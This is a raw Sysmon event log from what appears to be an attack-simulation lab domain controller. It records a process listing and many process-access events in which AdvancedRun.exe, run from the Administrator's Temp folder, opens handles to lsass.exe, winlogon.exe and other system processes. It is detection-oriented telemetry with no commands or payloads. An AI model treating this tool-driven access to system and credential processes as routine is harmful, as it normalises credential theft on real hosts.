4079737 | 2022-01-21 20:17:20.825 | {834264DD-DAF5-61EA-3900-000000002702} | 2664 | C:\Windows\System32\ismserv.exe | NT AUTHORITY\SYSTEM
4079736 | 2022-01-21 20:17:20.825 | {834264DD-DAF5-61EA-3800-000000002702} | 2272 | C:\Windows\system32\DFSRs.exe | NT AUTHORITY\SYSTEM
4079735 | 2022-01-21 20:17:20.825 | {834264DD-DAF5-61EA-3700-000000002702} | 1932 | C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe | NT AUTHORITY\SYSTEM
4079734 | 2022-01-21 20:17:20.825 | {834264DD-DAF5-61EA-3500-000000002702} | 1832 | C:\Windows\system32\dns.exe | NT AUTHORITY\SYSTEM
4079733 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-3400-000000002702} | 2460 | C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe | NT AUTHORITY\SYSTEM
4079732 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-3300-000000002702} | 2488 | C:\Windows\Sysmon64.exe | NT AUTHORITY\SYSTEM
4079731 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-3200-000000002702} | 1948 | C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM
4079730 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-3100-000000002702} | 660 | C:\Windows\System32\svchost.exe | NT AUTHORITY\NETWORK SERVICE
4079729 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-3000-000000002702} | 668 | C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM
4079728 | 2022-01-21 20:17:20.824 | {834264DD-DAF4-61EA-2D00-000000002702} | 2988 | C:\Windows\System32\spoolsv.exe | NT AUTHORITY\SYSTEM
4079727 | 2022-01-21 20:17:20.824 | {834264DD-DAF5-61EA-2F00-000000002702} | 2440 | C:\Windows\system32\svchost.exe | NT AUTHORITY\SYSTEM
4079726 | 2022-01-21 20:17:20.823 | {834264DD-DAF2-61EA-2C00-000000002702} | 2896 | C:\Windows\system32\conhost.exe | NT AUTHORITY\SYSTEM
4079725 | 2022-01-21 20:17:20.823 | {834264DD-DAF2-61EA-2B00-000000002702} | 2888 | C:\Users\Public\splunkd.exe | NT AUTHORITY\SYSTEM
4079724 | 2022-01-21 20:17:20.823 | {834264DD-DAF0-61EA-2900-000000002702} | 2760 | C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM
4079723 | 2022-01-21 20:17:20.821 | {834264DD-DAE8-61EA-2000-000000002702} | 1516 | C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE
4079722 | 2022-01-21 20:17:20.818 | {834264DD-DAE7-61EA-1800-000000002702} | 1384 | C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE
4079721 | 2022-01-21 20:17:20.818 | {834264DD-DAE7-61EA-1700-000000002702} | 1300 | C:\Windows\System32\svchost.exe | NT AUTHORITY\SYSTEM
4079720 | 2022-01-21 20:17:20.818 | {834264DD-DAE7-61EA-1600-000000002702} | 1264 | C:\Windows\system32\svchost.exe | NT AUTHORITY\LOCAL SERVICE
4079719 | 2022-01-21 20:17:20.818 | {834264DD-DAE7-61EA-1500-000000002702} | 1064 | C:\Windows\system32\svchost.exe | NT AUTHORITY\NETWORK SERVICE
4079718 | 2022-01-21 20:17:20.818 | {834264DD-DAE7-61EA-1400-000000002702} | 352 | C:\Windows\System32\svchost.exe | NT AUTHORITY\LOCAL SERVICE
4079717 | 2022-01-21 (UtcTime and the remaining EventData fields continue on the next line)
20:17:20.818{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004079716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004079715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079714Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079713Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079712Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004079711Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.817{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079710Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079709Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079708Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079707Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079706Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004079705Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:20.816{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 